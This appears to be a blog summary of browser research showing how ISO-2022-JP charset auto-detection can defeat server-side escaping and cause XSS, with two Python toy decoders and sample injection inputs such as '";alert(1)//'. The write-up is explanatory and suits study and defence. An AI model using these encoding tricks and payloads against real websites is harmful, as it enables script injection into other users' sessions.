Encoding Differentials: Why Charset Matters

Full Report

There are many byte encoding standards in use, such as UTF-8, UTF-16 and Big5, because we need a way to map bytes to characters. The server encodes characters to bytes using one charset and the browser decodes those bytes using a charset of its own choosing; most of the time the two are the same. This article finds a crazy bug in modern browsers that can lead to XSS and other issues when they are not.
In HTTP, the charset can be declared in three places: the charset attribute on the Content-Type header, a meta tag within the HTML, and a byte order mark (U+FEFF) at the start of the document. If the browser can't determine the charset from any of these, it falls back to auto-detection. The idea of the attack is to get data sent to the browser in one encoding but interpreted as another when the browser receives it. Back in the day, this was used to get XSS on Google via UTF-7. Modern browsers have banned UTF-7 though, and most charsets aren't helpful for smuggling in characters, except one.
ISO-2022-JP is a Japanese character encoding that browsers must support. It is stateful: escape sequences switch the character set used to decode the bytes that follow. For example, the byte sequence 0x1b 0x28 0x42 tells the decoder to treat the next set of bytes as ASCII instead of a Japanese character set. What's even better is that Chrome and Firefox will both auto-detect this encoding, which lets us cause havoc.
The first attack negates backslash escaping. It requires attacker-controlled input in two places: one near the top of the file and one further down, inside a string where double quotes are backslash-escaped on the server side to prevent XSS. Once an escape sequence is added in the first location, the browser switches from ASCII (the default mode) to the JIS X 0201 1976 character set. In this set, almost everything matches standard ASCII except two bytes: 0x5C and 0x7E. 0x5C is the yen sign instead of the backslash! So the backslash the server added in front of our double quote is displayed as a yen sign and no longer escapes anything. The quote now closes the string, and we can execute arbitrary JS because we escaped the string. That's pretty neat!
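To make the backslash trick concrete, here is a minimal sketch in Python. It is a toy model, not a real ISO-2022-JP decoder: `toy_decode` only understands the two single-byte modes, and `server_escape`, the page template and both inputs are hypothetical. The escape sequence 0x1b 0x28 0x4a for JIS X 0201 1976 comes from RFC 1468 rather than from the post itself.

```python
ESC_ASCII = b"\x1b(B"  # 0x1b 0x28 0x42: switch to ASCII
ESC_ROMAN = b"\x1b(J"  # 0x1b 0x28 0x4a: switch to JIS X 0201 1976 (per RFC 1468)


def toy_decode(data: bytes) -> str:
    """Simplified model of the two single-byte modes of ISO-2022-JP."""
    out = []
    roman = False  # the decoder starts in ASCII mode
    i = 0
    while i < len(data):
        chunk = data[i:i + 3]
        if chunk == ESC_ASCII:
            roman = False
            i += 3
        elif chunk == ESC_ROMAN:
            roman = True
            i += 3
        else:
            byte = data[i]
            if roman and byte == 0x5C:
                out.append("\u00a5")  # yen sign instead of backslash
            elif roman and byte == 0x7E:
                out.append("\u203e")  # overline instead of tilde
            else:
                out.append(chr(byte))
            i += 1
    return "".join(out)


def server_escape(value: str) -> str:
    """Hypothetical server-side escaping for a double-quoted JS string."""
    return value.replace("\\", "\\\\").replace('"', '\\"')


first_input = "\x1b(J"          # reflected near the top of the page
second_input = '";alert(1)//'   # reflected inside the JS string

page = (
    f"<p>{first_input}</p>"
    f'<script>var s = "{server_escape(second_input)}";</script>'
)
decoded = toy_decode(page.encode("ascii"))
print(decoded)  # <p></p><script>var s = "¥";alert(1)//";</script>
```

The server sent `\"`, which is safe in ASCII, but the decoded page contains `¥"`, so the quote terminates the string and `alert(1)` runs as code.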
The second technique applies when data is controlled in two separate locations within the HTML, such as an attribute and a plaintext section. The idea is to switch from ASCII to a Japanese character set inside the attribute, then switch back to ASCII within the plaintext. Everything in between, including the attribute's closing double quote, is decoded as Japanese characters, so the quote is effectively skipped and our later data is still INSIDE the attribute. The next double quote in the page, typically the one that opens a later attribute, then closes it, so the content of that later attribute is treated as HTML when it shouldn't be. Pretty neat!
How do we get the browser to use this encoding? According to the authors, controlling the charset directly or via a meta tag is nice. If no charset is declared, auto-detection picks ISO-2022-JP very easily, according to the authors. I'm guessing that it just looks for the escape sequences.
Overall, a great post on the complications of character encodings in the browser. The browser's attempt to help the web page has once again added a security mishap to the world.
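The attribute-breaking technique can be sketched the same way. This is again a toy model under loud assumptions: the escape sequence 0x1b 0x24 0x42 (JIS X 0208 1983, two bytes per character) is taken from RFC 1468, `toy_decode` replaces every consumed byte pair with a placeholder instead of looking up real characters, and the page template with its three reflected values is hypothetical.

```python
ESC_ASCII = b"\x1b(B"    # 0x1b 0x28 0x42: switch to ASCII
ESC_JIS0208 = b"\x1b$B"  # 0x1b 0x24 0x42: switch to JIS X 0208 1983 (per RFC 1468)


def toy_decode(data: bytes) -> str:
    """Simplified model: two-byte mode swallows bytes and emits placeholders."""
    out = []
    two_byte = False  # the decoder starts in ASCII mode
    i = 0
    while i < len(data):
        chunk = data[i:i + 3]
        if chunk == ESC_ASCII:
            two_byte = False
            i += 3
        elif chunk == ESC_JIS0208:
            two_byte = True
            i += 3
        elif two_byte:
            pair = data[i:i + 2]
            # A real decoder maps valid pairs to Japanese characters; this toy
            # only tracks which bytes get consumed and emits U+FFFD for them.
            if len(pair) == 2 and all(0x21 <= b <= 0x7E for b in pair):
                i += 2
            else:
                i += 1
            out.append("\ufffd")
        else:
            out.append(chr(data[i]))
            i += 1
    return "".join(out)


alt1 = "a\x1b$B"             # first attribute: switch to the two-byte set
text = "\x1b(B"              # plaintext: switch back to ASCII
alt2 = "onerror=alert(1)//"  # harmless as an attribute value, dangerous as markup

page = f'<img alt="{alt1}" src="x.png">{text}<img alt="{alt2}" src="y.png">'
decoded = toy_decode(page.encode("ascii"))

parts = decoded.split('"')
print("first attribute value:", parts[1])
print("text after it closes: ", parts[2])
```

In the decoded page the first `alt` value runs all the way to `<img alt=`, because its own closing quote was consumed in two-byte mode. The quote that was meant to open the second `alt` closes it instead, leaving `onerror=alert(1)//` outside any quoted value.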

Analysis Summary